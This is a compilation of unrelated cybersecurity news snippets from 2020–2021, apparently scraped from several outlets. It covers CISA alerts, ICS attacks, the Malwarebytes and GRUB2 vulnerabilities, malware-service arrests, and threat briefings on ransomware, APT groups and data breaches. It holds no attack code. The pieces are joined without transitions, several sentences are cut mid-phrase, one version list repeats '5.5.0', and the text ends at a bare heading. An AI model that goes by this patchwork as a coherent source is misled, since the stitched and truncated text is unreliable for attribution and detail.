Jan Kopriva, @jk0pr, Alef Nula

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Industrial Control Systems: The New Target of Malware

During 2020, CISA issued 38 cyber alerts, ranging from nation-state actors like Iran and North Korea to known ransomware specifically targeting pipeline operations, and notably the last alert of the year, issued on December 17, 2020 (Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations), covering the SolarWinds supply chain attack.

2020 represents a 660% increase in cyber alerts over 2019, during which CISA issued five cyber warnings over the full year.

Organizations across the board also saw a growing number of adversaries targeting and attacking industrial control systems (ICS) and operational technology (OT) networks. It’s a trend that is clearly continuing into the new year (‘Dangerous Stuff’: Hackers Tried to Poison Water Supply of Florida Town).

And as the attack surface of critical infrastructure continues to expand, with owners and operators adopting new technologies to improve operational efficiency, both the vulnerabilities in, and the targeting of, ICS and OT networks are expected to rise.

The post Industrial Control Systems: The New Target of Malware appeared first on Security Boulevard.


Original release date: January 27, 2021

CISA has released a malware analysis report on Supernova malware affecting unpatched SolarWinds Orion software. The report contains indicators of compromise (IOCs) and analyzes several malicious artifacts. Supernova is not part of the SolarWinds supply chain attack described in Alert AA20-352A.

CISA encourages users and administrators to review Malware Analysis Report MAR-10319053-1.v1 and the SolarWinds advisory for more information on Supernova.


A vulnerability, which was classified as problematic, was found in Malwarebytes up to 3.x on macOS (Anti-Malware Software). Affected is the function posix_spawn of the component Launch Daemon. Upgrading to version 4.0 eliminates this vulnerability.


An anonymous reader quotes a report from ZDNet: For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.


An issue was discovered in Malwarebytes before 4.0 on macOS. A malicious application was able to perform a privileged action within the Malwarebytes launch daemon. The privileged service improperly…

Read the original article: Expert launched Malvuln, a project to report flaws in malware The researcher John Page launched, the first website exclusively dedicated to the research of security flaws in malware codes. The security expert John Page (aka hyp3rlinx) launched malvuln.

Publication date: 11/20/2020

Two Romanian citizens have been arrested for allegedly running the malware encryption services, CyberSeal and Dataprotector, to avoid detection of antivirus software, and the Cyberscan service to test malware against antiviruses.

These services have been offered on the underground market since 2010 for no more than $300 per license, with regular updates and customer support. They have been used by more than 1,560 cybercriminals with different types of malware.

The police operation, coordinated by the European Cybercrime Centre (EC3), resulted in several house searches in Bucharest and Craiova, and the neutralisation of their backend infrastructure in Romania, Norway and the USA.


Cybercrime, Encryption, Incident, Internet, Malware, Other critical infrastructures


References:
- Romanian duo arrested for running malware encryption service to bypass antivirus software (europol.europa.eu)
- Romanians arrested for running underground malware services (securityaffairs.co)
- Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malware (seguridadyfirewall.cl)



Since 2016, the NJCCIC has gathered cyber threat intelligence information to develop specific threat profiles on Android malware, ATM malware, botnets, cryptocurrency-mining malware, exploit kits, industrial control systems (ICS) malware, iOS malware, macOS malware, point-of-sale malware, ransomware, and trojans.


Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how threat actors are bundling Windscribe VPN installers with backdoors. Also, read about a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications.



Read on:


Windows Backdoor Masquerading as VPN App Installer

This article discusses findings covered in a recent blog from Trend Micro where company researchers warn that Windows users looking to install a VPN app are in danger of downloading one that’s been bundled with a backdoor. The trojanized package in this specific case is the Windows installer for Windscribe VPN and contains the Bladabindi backdoor.

The Evolution of Malicious Shell Scripts

The Unix programming community commonly uses shell scripts as a simple way to execute multiple Linux commands from a single file. Many users do this as part of a regular operational workload: manipulating files, executing programs and printing text. However, as a shell interpreter is available on every Unix machine, it is also an interesting and dynamic tool abused by malicious actors.

Microsoft Says It Detected Active Attacks Leveraging Zerologon Vulnerability

Hackers are actively exploiting the Zerologon vulnerability in real-world attacks, Microsoft’s security intelligence team said on Thursday morning. The attacks were expected to happen, according to security industry experts. Multiple versions of weaponized proof-of-concept exploit code have been published online in freely downloadable form since details about the Zerologon vulnerability were revealed on September 14 by Dutch security firm Secura BV.

Stretched and Stressed: Best Practices for Protecting Security Workers’ Mental Health

Security work is stressful under the best of circumstances, but remote work presents its own challenges. In this article, learn how savvy security leaders can best support their teams today — wherever they’re working. Trend Micro’s senior director of HR for the Americas, Bob Kedrosky, weighs in on how Trend Micro is supporting its remote workers.

Exploitable Flaws Found in Facial Recognition Devices

To gain a more nuanced understanding of the security issues present in facial recognition devices, Trend Micro analyzed the security of four different models: ZKTeco FaceDepot-7B, Hikvision DS-K1T606MF, Telpo TPS980 and Megvii Koala. Trend Micro’s case studies show how these devices can be misused by malicious attackers.

New ‘Alien’ Malware Can Steal Passwords from 226 Android Apps

Security researchers have discovered and analyzed a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications. Named Alien, this new trojan has been active since the start of the year and has been offered as a Malware-as-a-Service (MaaS) offering on underground hacking forums.

Government Software Provider Tyler Technologies Hit by Possible Ransomware Attack

Tyler Technologies, a Texas-based provider of software and services for the U.S. government, started informing customers this week of a security incident that is believed to have involved a piece of ransomware. Tyler’s website is currently unavailable and in emails sent out to customers the company said its internal phone and IT systems were accessed without authorization by an “unknown third party.”

U.S. Justice Department Charges APT41 Hackers Over Global Cyberattacks

On September 16, 2020, the United States Justice Department announced that it was charging five Chinese citizens with hacking crimes committed against over 100 institutions in the United States and abroad. The global hacking campaign went after a diverse range of targets, from video game companies and telecommunications enterprises to universities and non-profit organizations. The five individuals were reportedly connected to the hacking group known as APT41.

Phishers are Targeting Employees with Fake GDPR Compliance Reminders

Phishers are using a bogus GDPR compliance reminder to trick recipients – employees of businesses across several industry verticals – into handing over their email login credentials. In this evolving campaign, the attackers targeted mostly email addresses they could glean from company websites and, to a lesser extent, emails of people who are high in the organization’s hierarchy.

Mispadu Banking Trojan Resurfaces

Recent spam campaigns leading to the URSA/Mispadu banking trojan have been uncovered, as reported by malware analyst Pedro Tavares in a Twitter post and by Seguranca Informatica in a blog post. Mispadu malware steals credentials from users’ systems. This attack targets systems with Spanish and Portuguese as system languages.

A Blind Spot in ICS Security: The Protocol Gateway Part 3: What ICS Security Administrators Can Do

In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways that are essential when shifting to smart factories and discusses the security countermeasures that security administrators in those factories must take. In the final part of this series, Trend Micro describes a stealth attack method that abuses a vulnerability as well as informs readers of a vital point of security measures required for the future ICS environment.

Major Instagram App Bug Could’ve Given Hackers Remote Access to Your Phone

Check Point researchers disclosed details about a critical vulnerability in Instagram’s Android app that could have allowed remote attackers to take control of a targeted device just by sending victims a specially crafted image. The flaw lets attackers perform actions on behalf of the user within the Instagram app, including spying on a victim’s private messages and deleting or posting photos from their account, as well as executing arbitrary code on the device.

Addressing Threats Like Ryuk via Trend Micro XDR

Ryuk has recently been one of the most noteworthy ransomware families and is perhaps the best representation of the new paradigm in ransomware attacks where malicious actors go for quality over sheer quantity. In 2019, the Trend Micro™ Managed XDR and Incident Response teams investigated an incident concerning a Trend Micro customer that was infected with the Ryuk ransomware.

What are your thoughts on the Android Instagram app bug that could allow remote access to user’s phones? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Distribute Backdoor with VPN Installer and New ‘Alien’ Malware can Steal Passwords from 226 Android Apps appeared first on .


Using knowledge from the ‘cyber frontline’ to improve our ‘Mitigating malware and ransomware’ guidance.

Gartner predicts the financial impact of cyber attacks resulting in fatal casualties will reach more than US$50 billion by 2023
As more physical industrial sites become connected, leaders themselves will be accountable for their security and safety 

In the age of Industry 4.0 and connected industry, we often discuss the relatively new and growing threat of cyber attacks in the context of financial damage. Ransomware, for example, can jam a steel crowbar into operations, leading to downtime, and subsequently hemorrhaging costs. 

As physical industries become connected and therefore vulnerable to attacks, they face the same risks as every other digital organization. 


But that’s not quite the extent of it. As warehouses, factories, power plants, and other physical facilities are further laden with sensor-based predictive analytics, remote access technologies, control networks, robotics, and other operational technology (OT), system attacks can quickly lead to physical harm to people, destruction of property or environmental disasters.

Previous malware attacks have demonstrated this potential. The Triton malware was found infecting safety systems in Saudi petrochemical plants in 2017. It gave attackers the ability to remotely shut off fail-safe systems in case there was a poisonous-gas leak or a critical failure — the last layer of defense before human life was at risk. 

There have been spear-phishing attacks on members of the US energy sector. The attempts, allegedly determined to be the work of North Korean hackers, have been thwarted, but could easily have led to attacks devastating the infrastructure of the country. As far back as 2015, a hack of Ukraine’s power grid caused a blackout affecting 200,000 people, while Kaspersky Labs estimates that over 40% of the ICS computers on its watch had been attacked by malware at least once in the first half of 2018.

In the same year, it was reported that the hacking of a control system for a steel mill in Germany meant a blast furnace could not be shut, leading to “massive” damage to the plant, but no reported loss of life. 

These types of cyber-physical security (CPS) incidents are fortunately rare, but are set to increase rapidly in the coming years due to a lack of security focus and spending. If business leaders don’t act, they could be held personally accountable when something goes wrong.


Industrial robots welding metal parts in a factory. Source: Shutterstock

The cyber-physical security threat

Gartner defines CPS as systems engineered to orchestrate sensing, computation, control, networking, and analytics to interact with the physical world — including humans. 

They underpin all connected IT, operational technology (OT), and Internet of Things (IoT) efforts where security considerations span both the cyber and physical worlds, such as asset-intensive, critical infrastructure, and clinical healthcare environments.

Gartner predicts that as this type of threat increases, business leaders will be caught off guard as liability for CPS incidents will “pierce the corporate veil” to personal liability for 75% of CEOs by 2024.

“Soon, CEOs won’t be able to plead ignorance or retreat behind insurance policies,” said Katell Thielemann, research vice president at Gartner. “Regulators and governments will react promptly to an increase in serious incidents resulting from failure to secure CPSs, drastically increasing rules and regulations governing them.

“In the U.S., the FBI, NSA and Cybersecurity and Infrastructure Security Agency (CISA) have already increased the frequency and details provided around threats to critical infrastructure-related systems, most of which are owned by private industry.”

Gartner predicts that the financial impact of CPS attacks resulting in fatal casualties will reach more than US$50 billion by 2023. The firm warns that, even with the actual value of human life in the equation, associated costs for organizations in terms of compensation, litigation, insurance, regulatory fines, and reputation loss will be significant. 

“Technology leaders need to help CEOs understand the risks that CPSs represent and the need to dedicate focus and budget to securing them,” said Thielemann. “The more connected CPSs are, the higher the likelihood of an incident occurring.”




With OT, smart buildings, smart cities, connected cars, and autonomous vehicles evolving, incidents in the digital world will have a much greater effect in the physical world as risks, threats and vulnerabilities now exist in a bidirectional, cyber-physical spectrum.

However, many enterprises are not aware of CPSs already deployed in their organization, either due to legacy systems connected to enterprise networks by teams outside of IT or because of new business-driven automation and modernization efforts.

The post CEOs will be held accountable for ‘killer’ malware in future, says Gartner appeared first on TechHQ.

A severe vulnerability exists in almost all signed versions of GRUB2, which is used by most Linux systems. If exploited properly, it would allow attackers to compromise the system boot process, even if the “Secure Boot” verification mechanism is active.

The flaw was reported by Eclypsium on July 29, although the associated CVE-2020-10713 is dated March 20, and while grub2 may be more directly associated with Linux systems, dual-boot (or multi-boot) machines open the door to exploitation of other systems such as Windows.

A flaw was found in grub2 versions prior to 2.06. An attacker may use the GRUB 2 flaw to hijack and tamper with the GRUB verification process. This flaw also allows the Secure Boot protections to be bypassed. In order to load an untrusted or modified kernel, an attacker would first need to establish access to the system, such as gaining physical access, having the ability to alter a “pxe-boot” network, or having remote access to a networked system with root access. With this access, an attacker could forge a string to cause a buffer overflow by injecting a malicious payload that leads to arbitrary code execution within GRUB. The highest threat from this vulnerability is to data confidentiality and integrity, as well as system availability.

According to BleepingComputer’s report, the vulnerability has been shared with operating system vendors, computer manufacturers and CERTs/CSIRTs. Advisories and possible mitigations from multiple organizations across the industry are expected to be published today.

We see this problem as having a low probability of occurrence, or at least a high degree of difficulty, since, as the CVE description states, special conditions are required to exploit the vulnerability. This does not mean we can stop worrying; rather, we should keep a close eye on the updates that will be arriving from the various vendors.

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Data breach, Cobalt Strike, Lazarus, Misconfigured Tools, and OilRig. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity.

Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Cerberus Banking Trojan Team Breaks Up, Source Code Goes to Auction

(published: July 27, 2020)

The Android banking trojan Cerberus has been put up for sale by the malware’s developer. The trojan, which uses overlays to phish banking credentials from users, has been listed with a starting price of $50,000. The operator of Cerberus claims the purchaser will receive the source code, module code, admin panel code, along with the current customer database with a monthly profit of $10,000. The sale of Cerberus is allegedly due to the development team breaking up.

Recommendation: Users should be cautious when downloading Android applications, as malicious apps occasionally bypass Google Play Store protections. It is crucial that all permissions of an application be examined prior to download.

Tags: Android Malware, Cerberus, Mobile Malware

Source Code from Dozens of Companies Leaked Online

(published: July 27, 2020)

Source code from a wide range of companies has been leaked due to misconfigured tools. Identified by Tillie Kottmann, the companies include Adobe, Disney, Lenovo, Microsoft, Motorola and Nintendo, among many others. Within the source code, developers’ names along with hardcoded credentials have been found.

Recommendation: It is crucial for your company to verify that access control is configured correctly prior to adding any sensitive data. As this story portrays, misconfigured software can cause leaks of sensitive information, which could be used for further malicious activity and cause significant harm to a company’s reputation.

Tags: Misconfigured tools, Data breach

Dave Data Breach Affects 7.5 Million Users, Leaked on Hacker Forum

(published: July 26, 2020)

Dave, a fintech company that offers overdraft protection, has suffered a data breach. The breach occurred when threat actors gained access to third-party provider Waydev, which enabled access to user data at Dave. The database contained over seven million user records, which included addresses, birth dates, email addresses, names, and phone numbers. The actor who stole the database first attempted to sell it on a hacker forum; however, they ended up releasing the database for free on another site.

Recommendation: Dave is requiring all users to perform a password reset; however, users need to be aware they are still at risk if they are using the same password for other sites as well.

Tags: Data breach, PII, Third party breach

Russia’s GRU Hackers Hit US Government and Energy Targets

(published: July 24, 2020)

The Federal Bureau of Investigation (FBI) and FireEye have both confirmed a series of campaigns by the Russian GRU-associated APT28, aka Fancy Bear. These attacks began in December 2018 and continued until at least May 2020. The initial vector appears to be spearphishing attacks against a number of US government, energy, and education organizations. One confirmed victim did not find any evidence of successful phishing, but did confirm that attackers had stolen multiple mailboxes from their email servers. Other initial attack vectors include password spraying and brute force. The long-term motivation behind these attacks is not clear, but is likely a variation of the past motives of APT28, including US election meddling and retaliatory attacks against the Olympic Anti-Doping Agency. The broadening of attacks to the US energy sector is especially troubling, as APT28 is believed to have been behind previous attacks against US and Ukrainian energy infrastructure and Industrial Control Systems (ICS).

Recommendation: Defense in depth, along with well-designed and regular employee training, is critical to all businesses but especially important for governments and industries. Entities responsible for ICS systems need to be aware of the security issues and vulnerabilities in these systems, and they should never be connected to the internet.

Tags: APT28, FancyBear, government, energy sector, spear-phishing

Chinese DJI Drones Come With Backdoor

(published: July 24, 2020)

Researchers from Synacktiv and GRIMM have released reports detailing security issues found within the DJI drone app. Developed by Chinese drone manufacturer Da Jiang Innovations, the app comes with an auto-update function that bypasses the Google Play Store; this function could be used to install malicious software on an Android device and send sensitive information directly to DJI’s servers. The app requests significant permissions (contacts, microphone, camera, location, storage, change network connectivity) and collects a user’s IMSI, IMEI and the serial number of the SIM card used; arguably, the servers have almost full control of a user’s phone, exhibiting similarities to a malware C&C server. The app also uses anti-debugging and encryption techniques to hinder security researchers. DJI has disputed these claims, calling the findings “typical software concerns” and arguing that the US DHS had found no evidence of suspicious data transmission.

Recommendation: All applications should be carefully researched prior to installing on a personal or work machine. Applications that request additional permissions upon installation should be carefully vetted prior to allowing permissions. Additionally, all applications, especially free versions, should only be downloaded from trusted vendors.

Tags: Android, drone, backdoor

Garmin Suffers Potential Ransomware Attack

(published: July 24, 2020)

Garmin’s services and applications have been experiencing outages over the previous week, and reports of a ransomware attack are beginning to surface. Garmin confirmed that its website and mobile app were both down, while also sending notes to its Taiwanese factories that there would be “two days of planned maintenance.” Researchers from SentinelOne noticed that these outages appeared to correlate with a WastedLocker attack against the company; several employees likewise alleged that Garmin had suffered an attack from WastedLocker. WastedLocker is ransomware believed to have been developed by the Russian group Evil Corp, better known for their Dridex and BitPaymer attacks. Garmin has currently not commented on a potential attack.

Recommendation: Educate your employees on the risks of opening attachments from unknown senders. Anti-spam and antivirus applications provided by trusted vendors should also be employed. Emails received from unknown senders should be treated with caution, and attachments from such senders should not be opened. Furthermore, it is important to have a comprehensive and tested backup solution in place, in addition to a business continuity plan for the unfortunate case of a ransomware infection.

MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact – T1486

Tags: Garmin, ransomware, Evil Corp, WastedLocker, cybercrime

MATA: Multi-platform Targeted Malware Framework

(published: July 22, 2020)

Security researchers from Kaspersky have identified a new malware framework called “MATA” that targets Windows, Linux, and macOS operating systems. Researchers believe the malware framework is linked to the North Korea-based Lazarus APT group. The framework has been used by the threat actors since April 2018 and has targeted entities in Poland, Germany, Turkey, Korea, Japan, and India. The targeted industries include a software company, an e-commerce provider, and an Internet Service Provider (ISP). The actors used MATA to perform various objectives on their victims, such as distributing VHD ransomware and querying victim databases to acquire customer lists. Analysis revealed that a variant of the Manuscrypt malware distributed by Lazarus also shares a similar configuration structure with MATA.

Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.

Tags: Lazarus, MATA

OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory

(published: July 22, 2020)

Palo Alto’s Unit42 discovered a variant of an OilRig-associated tool, which Unit42 calls RDAT, using a novel email-based command and control (C2) channel that relied on a technique known as steganography to hide commands and data within bitmap images attached to emails.

Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.

Tags: OilRig, Middle East, Email, C2

Chinese APT Targets India and Hong Kong with Updated MgBot

(published: July 21, 2020)

Researchers from Malwarebytes have released a report detailing the targeting of Indian and Hong Kong entities by an unnamed Chinese APT group. A spearphishing campaign spoofing an email from the Indian Government Information Security Center was observed targeting Indian government personnel. Once the attached .rar file was downloaded, it would inject a Cobalt Strike variant into the system. Other lure documents themed around Hong Kong immigration to the UK were discovered dropping an updated MgBot loader before injecting a Remote Access Trojan (RAT) through the AppMgmt Service on Windows. The RAT’s strings are either obfuscated or XOR-encoded, making analysis difficult. The targeting by a Chinese APT is likely due to the current climate between China and India as well as the political tensions in Hong Kong. Malwarebytes believes the actor shares TTPs with well-known Chinese groups such as Rancor, KeyBoy, and APT40; while still not offering attribution, the analysts believe this APT group has been active since 2014, continuously using variants of MgBot throughout.

Recommendation: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.

MITRE ATT&CK: [MITRE PRE-ATT&CK] Spearphishing for Information – T1397 | [MITRE ATT&CK] Access Token Manipulation – T1134 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] BITS Jobs – T1197 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] Data from Local System – T1005 | [MITRE ATT&CK] Exploitation for Privilege Escalation – T1068 | [MITRE ATT&CK] Network Service Scanning – T1046 | [MITRE ATT&CK] Obfuscated Files or Information – T1027

Tags: China, APT, MgBot, Cobalt Strike, India, Hong Kong, spearphishing, lure

Golden Chickens: Evolution Of The MaaS

(published: July 20, 2020)

Researchers from QuoIntelligence observed four new attacks throughout March and April utilizing the tools of the e-crime group Golden Chickens, which provides Malware-as-a-Service (MaaS). Researchers attributed each attack, with confidence varying from low to moderate, to the groups GC05, GC06.tmp, and FIN6. During the analysis, it was found that the Golden Chickens group has updated its tools, such as TerraLoader, more_eggs, and VenomLNK, with new features that incorporate anti-analysis techniques, new string obfuscation, and a brute-force implementation. Golden Chickens MaaS remains a preferred service provider for top-tier e-crime groups such as FIN6 and Cobalt Group.

Recommendation: Financially themed malspam emails are a common tactic among threat actors; therefore, it is crucial that your employees are aware of their financial institutions’ policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document with a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Such emails should be avoided and reported to the appropriate personnel.

MITRE ATT&CK: [MITRE ATT&CK] Regsvr32 – T1117 | [MITRE ATT&CK] Code Signing – T1116 | [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information – T1140 | [MITRE ATT&CK] Scheduled Task – T1053 | [MITRE ATT&CK] System Information Discovery – T1082 | [MITRE ATT&CK] System Network Configuration Discovery – T1016 | [MITRE ATT&CK] System Owner/User Discovery – T1033 | [MITRE ATT&CK] Remote File Copy – T1105 | [MITRE ATT&CK] Commonly Used Port – T1043 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] Standard Cryptographic Protocol – T1032 | [MITRE ATT&CK] Exfiltration Over Command and Control Channel – T1041 | [MITRE ATT&CK] User Execution – T1204 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] CMSTP – T1191

Tags: Terra loader, Golden chickens

MAR-17-352-01 HatMan—Safety System Targeted Malware. This malware analysis report discusses the components and capabilities of the HatMan malware and some potential mitigations. Media reporting also refers to this malware as both TRITON and TRISIS.

This updated malware analysis report is a follow-up to the updated malware analysis report titled MAR-17-352-01 HatMan – Safety System Targeted Malware (Updated A) that was published April 10, 2018, on the ICS-CERT website.

More malware designed for air-gapped systems. A British utility sustains a ransomware attack. The US Cyberspace Solarium Commission sees lessons in the pandemic for cybersecurity. Contact-tracing technologies take a step back, maybe a step or two forward. Rob Lee from Dragos compares the state of ICS security around the world; our guest is Ian Pitt from LogMeIn on lessons learned working remotely during COVID-19. Criminals increase ransomware attacks on hospitals, and swap templates to impersonate government relief agencies.

For links to all of today’s stories check out our CyberWire daily news brief:

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Bugs, Exploit, Healthcare Attacks, Naikon, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity.

Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Bugs in Two Related WordPress Plugins Together Risked Over 1 Million Websites

(published: May 10, 2020)

Two critical-severity WordPress plugin vulnerabilities have been identified by the Wordfence security team which could impact over a million WordPress websites. The two plugins affected are Elementor Pro and Ultimate Addons for Elementor, and the researchers have observed active exploitation of the vulnerabilities. Exploiting the Elementor Pro plugin allows for remote code execution attacks, granting a malicious actor the ability to gain full administrative access to WordPress if the site has open user registration. Websites with the “open user registration” option disabled can be exploited using the Ultimate Addons for Elementor registration bypass vulnerability. Developers behind both plugins have patched the flaws in Elementor Pro version 2.9.4 and Ultimate Addons for Elementor version 1.24.2.

Recommendation: Users of these WordPress plugins should ensure they are using Elementor Pro version 2.9.4 and Ultimate Addons for Elementor version 1.24.2 or newer, which include fixes for the vulnerabilities. All website owners, especially those using WordPress, should keep their installations and plugins up to date to ensure patches are installed as soon as they are available.

Tags: Vulnerabilities, WordPress, Plugin, Registration bypass, Remote code execution

Hacker Group Floods Dark Web with Data Stolen From 11 Companies

(published: May 9, 2020)

The threat group known as Shiny Hunters is selling millions of user records from 11 different companies on an undisclosed dark web marketplace. The databases being sold include a combined total of 164.2 million user records, and have been steadily streamed to the marketplace since the beginning of May 2020. As of the time of this writing, the prices for each database range between $500 and $5,000 USD. The first reported database belongs to Tokopedia, an Indonesian online store, with over 90 million user records. The other companies reportedly involved are Bhinneka, ChatBooks, Chronicle Of Higher Education, Ggumim, HomeChef, Mindful, Minted, StarTribune, Styleshare, and Zoosk. The affected companies have been contacted by Bleeping Computer, as the data breaches appear legitimate, despite not being 100% confirmed.

Recommendation: Individuals who have accounts with any of the impacted companies are strongly advised to change their login credentials immediately. Additionally, it is important not to reuse passwords across multiple sites and services. If the same credentials are used on any other sites, those accounts should also be updated with new, unique passwords.

Tags: Data breach, Shiny Hunters, Dark web marketplace

Naikon APT: Cyber Espionage Reloaded

(published: May 7, 2020)

Check Point Research has discovered evidence that the Advanced Persistent Threat (APT) group known as “Naikon” has been persistently targeting national government agencies in the Asia Pacific region since 2015 as part of a cyber-espionage campaign. Naikon APT has been using a new type of Remote Access Trojan (RAT) called “Aria-body” as a backdoor into government networks, targeting ministries of foreign affairs, science, and technology in Australia, Brunei, Indonesia, Myanmar, the Philippines, Thailand, and Vietnam. Aria-body infects the network and servers of one target, and then uses the compromised infrastructure to launch new attacks, exploiting the trust between departments and governments to increase the chances of success, according to the Check Point report. Naikon threat actors use several different infection methods to deliver the Aria-body RAT, including malicious emails containing a Rich Text Format (RTF) file weaponized with the “RoyalRoad” exploit builder, or directly via a legitimate executable file, which serves as a loader. These methods are aimed at personnel within target organizations so that the compromised servers can be used to more effectively infiltrate new agencies. According to reports by Kaspersky, ThreatConnect, and Defense Group Inc. in 2015, Naikon is believed to be Chinese-speaking and associated with China’s People’s Liberation Army (PLA) intelligence operations.

Recommendation: This Naikon campaign is highly targeted; therefore, it is likely that actors are impersonating government employees or agencies in spearphishing emails. All employees should be educated on the risk of opening attachments or following links received from unknown or unexpected senders. Anti-spam and antivirus protection should be implemented and kept up to date with the latest version to better ensure security.

MITRE ATT&CK: [MITRE ATT&CK] Spearphishing Attachment – T1193 | [MITRE ATT&CK] Security Software Discovery – T1063 | [MITRE ATT&CK] System Network Configuration Discovery – T1016

Tags: Naikon, APT, China, RAT, Aria-body, RoyalRoad, Malware

Europe’s Largest Private Hospital Operator Fresenius Hit by Ransomware

(published: May 6, 2020)

The private hospital operator Fresenius has been compromised by SNAKE ransomware. Fresenius is the largest European private healthcare provider and has been in high demand for its dialysis services and products used to combat the ongoing COVID-19 pandemic. The SNAKE ransomware is written in Golang and appeared in January 2020; it attempts to identify any processes linked to enterprise management tools and industrial control systems (ICS). This ransomware attack comes after a series of ransomware campaigns targeting healthcare providers who are attempting to respond to the pandemic.

Recommendation: Ransomware can potentially be blocked by using endpoint protection solutions (HIDS), but as this news shows, new threats are constantly evolving to bypass these protections. Always keep your important files backed up. In the case of ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies, who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals.

MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact – T1486

Tags: Fresenius, SNAKE, Ransomware, COVID-19

Microsoft’s GitHub Account Hacked, Private Repositories Stolen

(published: May 6, 2020)

Threat actors claim to have gained full access to Microsoft’s private GitHub account, and to have stolen over 500GB of data from private Microsoft projects. According to files released to Bleeping Computer by Shiny Hunters, the threat actors behind the breach, the event likely occurred March 28th, 2020, and Microsoft has stated that it is aware of and investigating the claims behind the leak. Analysts at Bleeping Computer and cyber intelligence firm Under the Breach are of the opinion that the stolen data does not appear to contain sensitive code for Windows or Office, and is mostly samples, test projects, and other generic items. Under the Breach did tweet concerns that private API keys or passwords could have inadvertently been left in the private repositories, as developers have done this in the past.

Recommendation: It is best practice for GitHub and other repository users not to commit personal config files into source control and to use password management tools and multi-factor authentication. While it is currently unknown how Shiny Hunters gained access to Microsoft’s private GitHub account, malicious actors are known to comb the Internet for config files with credentials listed in plain text to gain access to repositories. Avoid committing these files in the future and be sure to discuss best practices with team members.

Tags: Microsoft, GitHub, Shiny Hunters

Warning: Citrix ShareFile Flaw Could Let Attackers Steal Corporate Secrets

(published: May 5, 2020)

Three critical vulnerabilities have been identified in Citrix ShareFile customer-managed storage zone controllers. Citrix ShareFile, a file sharing solution for businesses, allows employees to securely access and share proprietary and sensitive business data. According to Citrix, the vulnerabilities (CVE-2020-7473, CVE-2020-8982, CVE-2020-8983), if exploited, would allow an unauthenticated malicious actor access to ShareFile users’ documents and folders. According to Nate Warfield, a Senior Security Program Manager for the Microsoft Security Response Center, a search on Shodan revealed close to 2,800 exposed Citrix ShareFile storage servers. Citrix has released a mitigation tool and updates that include fixes for the three vulnerabilities, which affect ShareFile storage zone Controller 5.9.0, 5.8.0, 5.7.0, 5.5.0, and 5.5.0. Citrix warns that even updated storage zone controllers that were created using vulnerable versions are at risk, and that the mitigation tool must also be run on primary and secondary storage zone controllers.

Recommendation: Threat actors are consistently looking for new ways to conduct malicious activity; therefore, it is crucial that your company has security and patch-maintenance policies in place. The security update should be applied as soon as possible to avoid potential exploitation. Citrix ShareFile customers that manage the zones themselves should ensure they are running a supported version and have run the mitigation tool (available at, requires login credentials) if necessary.

Tags: CVE-2020-7473, CVE-2020-8982, CVE-2020-8983, Citrix, ShareFile

APT Groups Target Healthcare and Essential Services

(published: May 5, 2020)

The US Department of Homeland Security (DHS) and Cybersecurity and Infrastructure Security Agency (CISA) have issued an alert regarding Advanced Persistent Threat (APT) actors targeting COVID-19 response organizations. The targeted entities include academia, healthcare, local governments, medical research, and pharmaceutical companies. The unnamed APT groups are using password spraying attacks, which are automated attacks that try a list of passwords against many accounts. The list of passwords could be a combination of previously compromised credentials or common passwords, among others.

Recommendation: It is crucial that your company has password policies in place to avoid repetition across accounts, and mandates a level of password complexity that can resist brute-force and password-spray attacks. Educate your employees about the dangers these styles of attacks pose, and why mitigation must be in place prior to an incident taking place. Threat actors of all levels of sophistication are capable of utilizing brute-force and password-spraying attacks; therefore, it is paramount that all companies take steps to avoid these attacks.

Tags: APT, COVID-19, Password spraying

Kaiji: New Chinese Linux Malware Turning to Golang

(published: May 4, 2020)

